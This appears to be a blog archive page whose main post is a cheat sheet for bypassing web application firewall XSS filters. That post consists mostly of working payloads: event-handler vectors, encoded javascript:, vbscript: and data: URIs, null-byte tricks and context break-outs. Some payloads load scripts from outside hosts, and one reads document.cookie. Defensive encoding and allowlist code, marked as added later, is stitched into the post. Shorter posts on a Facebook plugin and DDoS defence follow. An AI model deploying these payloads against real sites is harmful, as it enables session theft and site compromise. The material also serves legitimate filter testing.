Showing posts with label hacking-website. Show all posts

Oct 9, 2014

Bypass WAF XSS Filters

This article is taken from the XSS-filter bypass section of the paper "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters". The earlier part of that paper, which fingerprints the WAF in order to decide which test method to use, is skipped here; the focus is on the basic XSS testing process. Although the discussion is framed around WAFs, the techniques rely on the typical weaknesses of WAF filter rules rather than on any protocol-level issue, so they apply equally to other XSS filter scenarios. They should let a beginner pick up the basic methods of testing for XSS fairly quickly.


Bypassing Blacklists
Most sites filter using blacklists. There are three ways to test for a blacklist bypass:
1) brute-force testing (submit a large number of payloads and inspect the responses)
2) reasoning from the regular expressions the filter uses
3) using a browser bug

Preliminary tests

1) Try inserting some ordinary HTML tags, such as <b>, <i> and <u>, and look at how the page returns them: are they HTML-encoded, or are the tags filtered out?
2) Try inserting unclosed tags, for example <b, <i, <u, <marquee, and check the response to see whether a lone opening tag is also filtered.
3) Then test a few XSS payloads that practically every XSS filter will block:
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script src="http://rhainfosec.com/evil.js">
Check whether the response filters everything or only part of it. If alert, prompt and confirm survive, try a mixed-case variant:
<ScRiPt>alert(1);</scrIPt>
4) If the filter only strips the <script> and </script> tags, you can use
<scr<script>ipt>alert(1)</scr<script>ipt>
to get around it: once the inner <script> tags are stripped, what is left recombines into a complete payload.
5) Test with an <a href tag and see what the response returns:
<a href="http://www.google.com">Clickme</a>
If the <a href tag itself is not filtered, check whether the data inside href is filtered.
If it is not, insert the javascript: protocol and see what happens:
<a href="javascript:alert(1)">Clickme</a>
Check whether an error is returned, and whether the whole javascript: protocol is filtered or only the word javascript; in the latter case try a case-changed variant.
Continue by testing whether events can be used to trigger JavaScript:
<a href="rhainfosec.com" onmouseover=alert(1)>ClickHere</a>
to see whether the onmouseover event is filtered. Then test an invalid event to learn the filter rules:
<a href="http://www.madleets.com" onclimbatree=alert(1)>ClickHere</a>
Is it returned intact, or stripped just like onmouseover?
If it is returned intact, the filter uses a blacklist of event names. HTML5 offers more than 150 ways to execute JavaScript, so test a rare event:
<body/onhashchange=alert(1)><a href=#>clickit

Testing other tags

Next, test other tags and their attributes.

Src attribute

<img src=x onerror=prompt(1);>
<img/src=aaa.jpg onerror=prompt(1);>
<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>

iframe tag

<iframe src="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

embed tag

<embed/src=//goo.gl/nlX0P>

action attribute

Use the action attribute of <form, <isindex and similar tags to execute JavaScript:

<form action="javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
<form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK

formaction attribute

<isindex formaction="javascript:alert(1)" type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME

background attribute

<table background=javascript:alert(1)></table> // works in Opera 10.5 and IE6

poster attribute

<video poster=javascript:alert(1)//></video> // Opera 10.5 and below

data attributes

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?

code attribute

<applet code="javascript:confirm(document.cookie);"> // works in Firefox
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

Event triggers

<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">

The shortest test vectors

<q/oncut=open()>
<q/oncut=alert(1)> // very effective where the input length is limited

Nesting

<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<body language=vbs onload=alert-1 // works in IE8
<command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // works in IE8

When parentheses are filtered

When the parentheses are filtered, throw can be used to bypass the filter:
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
In Chrome and IE these two vectors show an "uncaught" prefix in the error message; the following vector avoids that:
<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';>

expression attribute

<img style="xss:expression(alert(0))"> // IE7 and below
<div style="color:rgb(''&#0;x:expression(alert(1))"></div> // IE7 and below
<style>#test{x:expression(alert(/XSS/))}</style> // IE7 and below

location attribute

<a onmouseover=location='javascript:alert(1)'>click
<body onfocus="location='javascript:alert(1)'">123

Some other payloads

<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
<svg><![CDATA[><image xlink:href="]]><img/src=xx:x onerror=alert(2)//"></svg>
<meta content="&NewLine;1&NewLine;;JAVASCRIPT&colon;alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click

When = ( ) ; : are filtered

<svg><script>alert&#40/1/&#41</script> // works in all browsers
Opera: the tag cannot be left unclosed
<svg><script>alert&#40 1&#41 // Opera untested

Entity encoding

In many cases the WAF will entity-encode the user's input. JavaScript is a very flexible language that accepts many encodings, such as hex, Unicode and HTML entities, but each encoding is only usable in certain positions:
Attributes:
href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
Supported encodings: HTML entities, octal, decimal, hexadecimal and Unicode
Attribute:
data=
Supported encoding: base64

Filtering based on context

The biggest problem for a WAF is that it does not know the context in which the output is placed, so it can be bypassed in context-specific ways.

Input inside an attribute

<input value="XSStest" type=text>
XSStest is the controllable position; you can use
"><img src=x onerror=prompt(0);>
If < and > are filtered, it can be replaced with
"autofocus onfocus=alert(1)//
Many other payloads work in the same way:
"onmouseover="prompt(0) x="
"onfocusin=alert(1) autofocus x="
"onfocusout=alert(1) autofocus x="
"onblur=alert(1) autofocus a="

Input inside a script tag

For example:
<script>
var x="Input";
</script>
Input is the controllable position. You can close the script tag and insert code, but it is enough to close the double-quoted string to execute JavaScript:
";alert(1)//
The end result is
<script>
var x="";alert(1)//
</script>
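The two context examples above (a value inside an HTML attribute and a value inside a JavaScript string) make the point that only the application knows which context a value lands in. As an added example, not code from the original article, the following encodes a value for each of those two sinks, renders the article's two templates with constructed break-out inputs, and checks that the markup structure is unchanged.

```javascript
// Added example (not from the original article): context-aware output
// encoding for the two sinks discussed above, an HTML attribute value
// (<input value="...">) and a JavaScript string literal (var x = "...").
// A WAF cannot tell which sink a value reaches; the template author can.

// HTML attribute context: escape every character that could end the
// quoted value or start a new tag or attribute, as numeric entities.
function encodeForHtmlAttr(value) {
  return String(value).replace(/[&<>"'`=\/]/g,
    (c) => '&#x' + c.charCodeAt(0).toString(16) + ';');
}

// JavaScript string context: JSON.stringify escapes the quote and the
// backslash; the extra pass turns < > and the U+2028/2029 line terminators
// into \u escapes, so neither "</script>" nor a line break can terminate
// the literal or the <script> block.
function encodeForJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The two templates from the article, rendered with context encoding.
function renderInput(userValue) {
  return '<input value="' + encodeForHtmlAttr(userValue) + '" type=text>';
}
function renderScript(userValue) {
  return '<script>var x=' + encodeForJsString(userValue) + ';</script>';
}

// Constructed inputs shaped like the article's break-out attempts.
const ATTR_BREAKOUT = '"autofocus onfocus=alert(1)//';
const SCRIPT_BREAKOUT = '</script><svg onload=alert(1)>";alert(1)//';

function countOf(text, needle) {
  return text.split(needle).length - 1;
}
// Containment checks: the attribute template must still contain exactly one
// tag and one pair of quotes; the script template exactly one opening and
// one closing script tag and no other '<'.
function attrContained(html) {
  return countOf(html, '<') === 1 && countOf(html, '"') === 2;
}
function scriptContained(html) {
  return countOf(html, '<') === 2 && countOf(html, '</script>') === 1;
}

console.log(renderInput(ATTR_BREAKOUT), attrContained(renderInput(ATTR_BREAKOUT)));
console.log(renderScript(SCRIPT_BREAKOUT), scriptContained(renderScript(SCRIPT_BREAKOUT)));
```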

Unconventional event listeners

For example:
";document.body.addEventListener("DOMActivate",alert(1))//
";document.body.addEventListener("DOMActivate",prompt(1))//
";document.body.addEventListener("DOMActivate",confirm(1))//
The following are some of the same categories:
DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

Controllable href content

For example:
<a href="Userinput">Click</a>
Userinput is the controllable position; all we need to do is enter JavaScript code such as:
javascript:alert(1)//
which gives:
<a href="javascript:alert(1)//">Click</a>

Transformations

Use URL encoding and HTML entities to bypass the blacklist; entities inside href are decoded automatically. If all else fails, try vbscript, which works in IE10 and below, or the data protocol.

JavaScript transformation

When using the javascript protocol, variants such as these can be used:
javascript&#00058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
javascript&#x3A;alert&lpar;document&period;cookie&rpar;

Vbscript transformation

vbscript:alert(1);
vbscript&#00058;alert(1);
vbscr&Tab;ipt:alert(1)"

Data URL

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
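The transformations listed above show why a literal blacklist for javascript:, vbscript: and data: is unreliable. As an added example, not code from the article, the following JavaScript decodes the entity forms the article uses, normalises the URL the way a browser's URL parser does, and accepts only relative and http/https hrefs; it runs the article's own variants through both approaches. The allowlist of accepted schemes is an assumption of the example.

```javascript
// Added example (not from the original article): why a scheme blacklist
// misses the href variants listed above, and an allowlist check that does
// not. The named entities decoded here are the ones the article uses.
const NAMED_ENTITIES = { Tab: '\t', NewLine: '\n', colon: ':', sol: '/',
                         lpar: '(', rpar: ')', period: '.' };

// Decode the entity forms a browser decodes inside an attribute value:
// named, decimal (&#58; with any leading zeros) and hex (&#x3A;).
function decodeEntities(text) {
  return text.replace(/&(#x([0-9a-f]+)|#([0-9]+)|([A-Za-z]+));?/gi,
    (match, _all, hex, dec, name) => {
      if (hex) return String.fromCodePoint(parseInt(hex, 16));
      if (dec) return String.fromCodePoint(parseInt(dec, 10));
      return name in NAMED_ENTITIES ? NAMED_ENTITIES[name] : match;
    });
}

// Normalise the way the URL parser does before the scheme is read: tab, LF
// and CR are removed anywhere, leading/trailing controls and spaces trimmed.
// Returns the lower-cased scheme, or null for a relative URL.
function extractScheme(rawHref) {
  const url = decodeEntities(rawHref).replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Allowlist (assumed policy): relative URLs and http/https only; javascript:,
// vbscript: and data: are rejected however they are spelled or encoded.
function isAllowedHref(rawHref) {
  const scheme = extractScheme(rawHref);
  return scheme === null || scheme === 'http' || scheme === 'https';
}

// The literal blacklist a regex-based WAF rule applies to the raw value.
function blacklistBlocks(rawHref) {
  return /javascript:|vbscript:|data:/i.test(rawHref);
}

// Variants from the article's transformation lists plus two benign URLs.
const HREFS = ['javascript&#00058;alert(1)', 'javaSCRIPT&colon;alert(1)',
  'JaVaScRipT:alert(1)', 'javas&Tab;cript:\\u0061lert(1);', 'vbscr&Tab;ipt:alert(1)',
  'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
  'http://www.google.com', '/relative/path?x=1'];
for (const h of HREFS) {
  console.log(blacklistBlocks(h) ? 'blacklist:block' : 'blacklist:miss ',
              isAllowedHref(h) ? 'allowlist:pass ' : 'allowlist:block', h);
}
```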

JSON

When the input is displayed inside encodeURIComponent, it is very easy to insert XSS code:
encodeURIComponent('userinput')
userinput is the controllable position; test code:
-alert(1)-
-prompt(1)-
-confirm(1)-
The end result:
encodeURIComponent("-alert(1)-")
encodeURIComponent("-prompt(1)-")

SVG tag

When the result is returned inside an svg tag there is a special feature:
<svg><script>var myvar="YourInput";</script></svg>
YourInput is the controllable input:
www.site.com/test.php?var=text";alert(1)//
Even if the " is encoded, the code still executes:
<svg><script>var myvar="text&quot;;alert(1)//";</script></svg>

Browser bug

Charset bugs have appeared in IE many times; the first was UTF-7, but that only works in older versions. Here we discuss a case that executes JavaScript in browsers still in use.
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
In this page we control the character set of the current page. A normal test:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v="><img src=x onerror=prompt(0);>
The response shows that the double quotes have been encoded:
<html>
<meta charset="utf-8"></meta>
<body>
<input type="text" value="&quot;&gt;&lt;img src=x onerror=prompt(0);&gt;"></input>
</body>
</html>
Set the character set to UTF-32:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
The above executes successfully in IE9 and below.
Null-byte bypass:
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
Effective in IE9 and below.

Sep 20, 2014

Post Your Blog Posts To Your Facebook Wall Automatically

A WordPress plugin that cross-posts your blog posts to your Facebook Wall. Your Facebook "Boxes" tab will show your most recent blog posts.

Sep 18, 2014

What Are DDoS Attacks? How To Defend Against Them?

You may have heard of a DDoS (distributed denial-of-service) attack in the news as a method malicious hackers use to attack a website. It is possible you have even experienced the effects of a DDoS attack yourself. If you host a website or other online service, being aware of the dangers of a DDoS attack can help you prevent one, or mitigate the damage it can cause.


A New Type Of Warfare

A WikiLeaks story from 2010 has redefined DDoS attacks as a legitimate form of protest. Computing expert Richard Stallman has gone on record saying DDoS attacks are "the Internet equivalent of a mass demonstration." Stallman defines such "demonstrations" as being separate from hacking or cracking, and compares them with harmless demonstrations that temporarily closed down several British stores recently, in order to highlight corporate tax evasion.

Distributed Denial of Service Attacks

Sometimes a cracker uses a network of zombie computers to sabotage a specific website or server. The idea is pretty simple: the cracker tells all the computers in his botnet to contact a specific server or website repeatedly. The sudden increase in traffic can make the site load very slowly for legitimate users, and sometimes the traffic is enough to shut the site down completely. This kind of attack is called a Distributed Denial of Service (DDoS) attack.

Ways To Defend Against DDoS Attack

  1. Develop a checklist for standard operating procedures to follow in the event of an attack, including maintaining a checklist of contact information for internal firewall teams, intrusion detection teams and network teams, as well as for service providers. Identify who should be contacted during an attack, what processes should be followed by each and what information is needed.
  2. ISPs and hosting providers might provide mitigation services. Be aware of the service-level agreement provisions.
  3. Identify and prioritize critical services that should be maintained during an attack so IT staff will know what resources can be turned off or blocked as needed to limit the effects of the attack.
  4. Ensure that critical systems have sufficient capacity to withstand an attack.
  5. Keep network diagrams, IT infrastructure details and asset inventories current and available to help understand the environment. Have a baseline of the daily volume, type, and performance of network traffic to help identify the type, target and vector of attack. Identify existing bottlenecks and remediation actions needed.
  6. Harden the configuration settings of the network, operating systems and applications by disabling unnecessary services and applications.
  7. Implement a bogon (bogus IP address) block list at the network boundary to drop bogus IP traffic.
  8. Employ service screening on edge routers where possible to decrease the load on stateful security devices such as firewalls.
  9. Separate or compartmentalize critical services, including public and private services; intranet, extranet, and Internet services; and create single-purpose servers for services such as HTTP, FTP, and DNS.